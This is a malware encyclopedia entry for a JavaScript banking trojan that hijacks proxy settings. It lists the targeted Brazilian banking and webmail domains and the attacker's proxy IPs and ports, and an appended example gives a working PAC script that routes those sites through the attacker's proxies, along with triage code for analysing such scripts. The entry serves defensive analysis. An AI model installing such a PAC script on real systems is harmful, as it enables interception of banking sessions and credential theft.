
TrojanProxy:JS/Banker.M


First posted on 02 April 2012.
Source: Microsoft

Aliases :

TrojanProxy:JS/Banker.M is also known as Trojan-Banker.JS.Proxy.ae (Kaspersky), JS/Banker.T (Avira), Win32/Spy.Banker.XLF trojan (ESET) and Trojan-Banker.JS.Proxy (Ikarus).

Explanation :

TrojanProxy:JS/Banker.M is a JavaScript trojan that intercepts communication between an infected computer and certain online banking websites, resulting in the possible theft of logon credentials or other sensitive information.





Installation

TrojanProxy:JS/Banker.M may be installed by other malware as an automatic proxy configuration (PAC) script. A PAC script is a small JavaScript file that the browser, and any other application that honours the system proxy settings, consults before each request; it defines a FindProxyForURL(url, host) function that returns either DIRECT or the address of a proxy to use. On Windows the location of the script is stored in the AutoConfigURL value under HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings, so an unexpected value there, or a PAC file on disk that lists banking domains, is the first thing to check on a suspected machine.



Payload

Steals sensitive information

TrojanProxy:JS/Banker.M watches for requests to any of the following sites in its effort to steal logon credentials and other sensitive information:

  • 161.113.4.71
  • 170.66.11.10
  • 193.32.34.107
  • 199.67.180.39
  • 200.220.178.3
  • 201.20.136.5
  • 201.77.87.14
  • americanexpress.com.br
  • bancobradesco.com.br
  • bancoitau.com.br
  • bancosantander.com.br
  • bb.com.br
  • bradesco.com.br
  • caixa.com.br
  • caixaeconomica.com.br
  • cef.com.br
  • citibank.com
  • citibank.com.br
  • credicard.com.br
  • hotmail.com
  • hotmail.com.br
  • hsbc.com
  • hsbc.com.br
  • hsbcbank.com.br
  • hsbcpremier.com.br
  • itau.com.br
  • itaupersonnalite.com.br
  • latinamerica.citibank.com
  • login.live.com
  • pagseguro.uol.com.br
  • paypal.com
  • paypal.com.br
  • real.com.br
  • santander.com.br
  • santanderempresarial.com.br
  • santandernet.com.br
  • santandernetibe.com.br
  • serasa.com.br
  • serasaexperian.com.br
  • sicredi.com.br
  • tam.com.br


Please note that this list is not exhaustive.

If the affected user visits any of the above listed sites, the script answers the browser's proxy lookup with a proxy server chosen by the trojan author instead of DIRECT, so every request to those sites passes through that server while all other traffic is unaffected and the victim notices nothing. The attacker's proxy then sits in the middle of the banking session and can log or alter what the victim sends, which could result in the theft of logon credentials or other sensitive information. Because this works through the system proxy setting, it requires no change to DNS or the hosts file and affects any application that honours that setting.

Listed below are the known IP addresses and ports of the trojan's proxy servers:

  • 216.245.220.24 port 1023
  • 186.202.61.89 port 80
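The following is an added example, not the trojan's own script. It models the mechanism described in the Installation and Payload sections above: a PAC file that returns the attacker's proxy only for the watched hosts and DIRECT for everything else, together with the two checks an analyst runs on a suspicious PAC file (a static extraction of every proxy endpoint the script can return, and a dynamic probe that feeds the script a list of hostnames). The PAC body is constructed to mimic the behaviour on this page; the hostnames and proxy endpoints come from the page's lists, and the helper functions are small ports of the ones browsers expose to PAC scripts.

```javascript
// Added example (not the malware's own script): a constructed PAC file that
// mimics the behaviour described on this page, plus two triage checks.

// Constructed PAC script. A PAC file is plain JavaScript that must define
// FindProxyForURL(url, host); the browser calls it before every request.
// Hosts and proxy endpoints are taken from the lists on this page.
const SAMPLE_PAC = `
function FindProxyForURL(url, host) {
  if (dnsDomainIs(host, "bradesco.com.br") ||
      dnsDomainIs(host, "itau.com.br") ||
      shExpMatch(host, "*paypal.com") ||
      host == "login.live.com" ||
      host == "201.20.136.5") {
    // Only the watched hosts are sent to the attacker's proxies; the rest of
    // the web goes DIRECT, so the victim notices nothing.
    return "PROXY 216.245.220.24:1023; PROXY 186.202.61.89:80";
  }
  return "DIRECT";
}
`;

// Minimal versions of the helper functions browsers expose to PAC scripts
// (ported from the Mozilla reference implementation; note that dnsDomainIs is
// a plain suffix match and does not insist on a dot boundary).
const pacHelpers = {
  dnsDomainIs: (host, domain) =>
    host.length >= domain.length && host.slice(-domain.length) === domain,
  isPlainHostName: (host) => !host.includes("."),
  shExpMatch: (str, glob) => {
    const re = glob
      .replace(/[.+^${}()|[\]\\]/g, "\\$&") // escape regex metacharacters
      .replace(/\*/g, ".*")                 // shell '*' -> regex '.*'
      .replace(/\?/g, ".");                 // shell '?' -> regex '.'
    return new RegExp("^" + re + "$").test(str);
  },
};

// Compile a PAC script in a scope where only the helper functions are in
// reach and return its FindProxyForURL. This is a triage convenience, not a
// security boundary: do not run an untrusted PAC this way on a machine that
// matters.
function loadPac(pacText) {
  const names = Object.keys(pacHelpers);
  const factory = new Function(...names, pacText + "\nreturn FindProxyForURL;");
  return factory(...names.map((n) => pacHelpers[n]));
}

// Ask the PAC where a given URL would be sent, as the browser would.
function resolveProxy(pacText, url) {
  const host = new URL(url).hostname;
  return loadPac(pacText)(url, host);
}

// Check 1 (static): every proxy endpoint the script can literally return.
// Unknown IP:port pairs here are the indicator to pivot on.
function extractProxies(pacText) {
  const found = new Set();
  for (const m of pacText.matchAll(/\bPROXY\s+([A-Za-z0-9.-]+:\d+)/g)) {
    found.add(m[1]);
  }
  return [...found];
}

// Check 2 (dynamic): feed the script a list of hostnames (the banking domains
// above plus a few benign controls) and report which ones it refuses to send
// DIRECT. This still works when the PROXY string is obfuscated.
function hostsRoutedViaProxy(pacText, hosts) {
  const findProxy = loadPac(pacText);
  return hosts.filter((h) => findProxy("https://" + h + "/", h) !== "DIRECT");
}

// Stand-alone demonstration.
console.log(resolveProxy(SAMPLE_PAC, "https://www.bradesco.com.br/login"));
console.log(resolveProxy(SAMPLE_PAC, "https://www.example.com/"));
console.log(extractProxies(SAMPLE_PAC));
console.log(hostsRoutedViaProxy(SAMPLE_PAC,
  ["www.itau.com.br", "www.example.com", "login.live.com"]));
```

The static check is cheap but only finds literal "PROXY host:port" strings; a script that builds the return value from concatenated or decoded fragments defeats it, which is why the dynamic probe is the second check. Because a PAC author controls the matching logic, probe with the full watched-host list plus benign control hosts rather than a handful of guesses.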




Analysis by Shali Hsieh

Last update 02 April 2012
